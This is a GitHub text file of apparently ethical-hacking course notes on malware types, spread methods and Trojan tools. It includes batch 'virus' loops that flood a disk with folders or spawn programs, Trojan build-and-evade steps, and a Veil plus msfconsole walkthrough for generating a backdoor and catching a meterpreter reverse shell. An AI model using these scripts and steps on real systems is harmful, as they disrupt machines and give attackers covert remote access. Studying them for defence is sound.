-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathmodule 6 malware.txt
262 lines (186 loc) · 8.8 KB
/
module 6 malware.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
1.Malware concepts:
Malware is the combination of two words i.e
malicious+software.
software: software is a piece of code or a script which is designed to perform a particular task
and if that sofware is made to full fill his/her any intesion then that is malicious software.
Malware can infect any system by being bundled with any system or attached with any file.
An attacker can infect any system,network or any devices by finding any vulnerability in those and installing it on that,
also by social engineering where a person click on some link or mail and behind it the malware gets executed.
https://youtu.be/V-WleeTocu4
Purpose of Malware:
>Files Steal
>encryption or deleting sensitive data
>spy
>corrupt system/application/
>tamper normal working of a system/app/
>misuse system resources--RAM/CPU/STORAGE
>user activity(online/offline)monitor--browser/desktop surf/files/view/
>user key strokes monitor
>extort money--after infecting your system they can ask you for money
saying that he will resolve it.
How malware spreads:
1.free softwares:
People dont want to buy the softwares so what they do is they download from any insecure sites,and in that
software hacker bind their malware...and once its downloaded into the system then it can give access to the attacker,
hacker can also create a backdoor so that even after the uninstallation of software attacker can remotely access the victim system.
so that in coorporate or in any organisation they dont use free softwares.
2.Email communications:
an attacker can act like anyone like,he acts as an any organisation and sent u the mail saying that they are hiring u and paying you
that much of ammount,and with that mail he has sent u the pdf saying that go through this pdf so that u can have more brief info.
but that pdf came with the malware,so once u open that pdf at the same time the malware gets executed and can compromise your system.
3.Removal devices:
suppose an attacker asked you for any files and asked u to provide him..and also asked you if he use his pendrive to get the file
and u allow him to and through that pendrive an attacker can leave his malware and can compromise your system.
EX:rubber ducky usb(it send 1000 command per sec)it can steal your SAM file and also passwords from the chrome.
*Types of Malware:
1.Virus
2.Worms:stuxnet,snowden movie
3.Trojan horse
4.Ransomeware
5.Rootkit
6.Spyware
7.keylogger:REFOG
1.Virus:
It requires human interaction to spread the infection.
like through:usb/email attachment/harmful/
user's click is required.
Indication of Virus:
>BSOD(Blue Screen of Death)
>System will be slow
>Unneccessary files will run in the background
Types of Virus:
1.boot sector virus:
Our hard drive is divided into sectors and their first sector is MBR(Master Boot Record).
MBR contains the information that what OS is our PC using and boot our system as it contains boot loader.
So,when our system gets infected with boot sector virus then at the place of MBR virus gets placed and move the MBR into the
next sector.
2.file virus:
Comes with .exe file when we execute .exe
virus will executed.
3.macro virus:
Mainly target ms office,A virus written in
VBS(Visual Basics script)
Macro viruses are programmed to perform lots of tasks on computers. For example, a macro virus can create new files, corrupt data, move text, send files, format hard drives, and insert pictures.
4.cluster virus:
Ties itself with any executable and whenever we open that .exe
virus will get executed.
Cluster viruses change the directory so that when you try to run a program you first run the virus.
5.stealth virus:
Try to hide and avoid being detected by antivirus (FUD) fully
undetectable virus.
6.logic bomb:
It will executed at a given date and time.
7.encryption virus:
Encrypt itself to avoid identified by antivirus.
8.metamorphic virus:
Can be able to change its code and signatures to be able to
undetectable by antivirus.
9.shell virus:
It will executed inside a shell (shell is the deepest part of system)
Make a Virus:
:test
md test
cd test
goto test
save as .bat and double click on file to execute.
The BAT file format is implemented for DOS(disk operating system) batch files that contain code for initializing and executing certain built-in Windows applications and resources. Sequential lines of code contained in a BAT file is normally implemented for running installed applications, built-in programs and maintenance utilities in Windows systems. These BAT files can be created by using Microsoft Notepad among other text editors, and a BAT file can be created, also with these text editing applications, in order to automate certain repetitive tasks that may be performed by some installed Windows applications. Files affixed with the .bat extension can also be opened and edited using Microsoft Notepad among other text editors.
DOS (Disk Operating System) is an operating system that runs from a hard disk drive. The term can also refer to a particular family of disk operating systems, most commonly MS-DOS (Microsoft Disk Operating System).Jun 21, 2016
:test
start calc
start notepad
start mspaint
save as .bat and double click on file to execute.
:test
md %random%
goto test
*malicious batch scripts....go for this on google for more
viruses.
2.Worms:
ability to self replicate/self propogate--inside and
outside the network.
A computer worm is a type of malware that spreads copies of itself from computer to computer. A worm can replicate itself without any human interaction, and it does not need to attach itself to a software program in order to cause damage
Virus total is the website where we can detect our files or anything,and it runs 60 to 70 anti-viruses to detect if they contains any malware.
Trojan horse:
Link:https://www.youtube.com/watch?v=Td1uPq9K--E
It is the same concept as we discussed,the same method to be get installed into the system and compromise it.
There are some ports if they are open inside your system then it means your pc is infected by the trojan:
2
20
1095-1098 used by RAT (Remote access trojan)
17300 Netbus (dangerous trojan)
10080 sub7 (very deadlious of all time)
65506 sub7
Trojan process:
1.Create a trojan using trojan construction kit.
2.Using wrapper to wrap it ->we bind trojan with any genuine
application using wrapper.
3.use encryption so that it will not get recognized by ids(intrusion detection system) and ips(intrusion prevention system).
4.send it to victim
5.take control
Languages used to make trojan:
Assesbly language:fast and undetectable
C,C++
Python -> easy learn,build malware and easily detectable.
Types of Trojan:
1.Defacement tojan:
after compromising any website or system,hacker displays the
any black blue or any color on your screen nad leave the msg there
like u have been hacked.
2.HTTP and HTTPS Trojan:
They target the web applications.
3.RAT(Remote access trojan):
you can remotely access the computer.
Trojan tools:
Prorat
Darkhorse trojan virus maker
ROOTKIT:A rootkit is a malicious software that allows an unauthorized user to have privileged access to a computer and to restricted areas of its software. A rootkit may contain a number of malicious tools such as keyloggers, banking credential stealers, password stealers, antivirus disablers, and bots for DDoS attacks
Rootkit tools:
1.Horse pill (Linux)
2.Gray fish (Windows)
3.Sirefef
4.Necurs
8.SPYWARE:Spyware is used to detect what victim is searching,which website
he is visiting,how much time he is spending on a perticular site.
9.Keylogger:It is used to detect your keyboard,
whatever you give the input through your keyboard
all will be detected by the hacker.
*Files that is executable in Windows:
bat:batch file
bin:binary executable
cmd:command script
exe:executable
com:command file
*Files that is executable in Windows:
.deb file if it is debian based
.elf
Reverse shell:
Bind shell:
LHOST LPORT:
RHOST RPORT:
MSFVENOM:
RAT:(Remote administration tool)
Darkcomet:it disable the defender and antivirus
EXTRA:::
VEIL:
Veil is a framework for generating backdoor.
steps:
>list
1.evasion(it detects backdoor for us)
2.ordnance(it generates payload used by evasion)
>use 1
>list(to see all available payloads)
>use 15
>set LOST ip,set processors 1,set lport 8080,set sleep 6
>options
>generate
>rev_https_8080
msfconsole
>use exploit/multi/handler (it allow us to listen the incoming connection)
>show options
>set payload windows/meterpreter/reverse_https
>exploit
*Similar tools
>>Empire
>>The FatRat
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
Windows10 Download Link: https://developer.microsoft.com/en-us/microsoft-edge/tools/vms/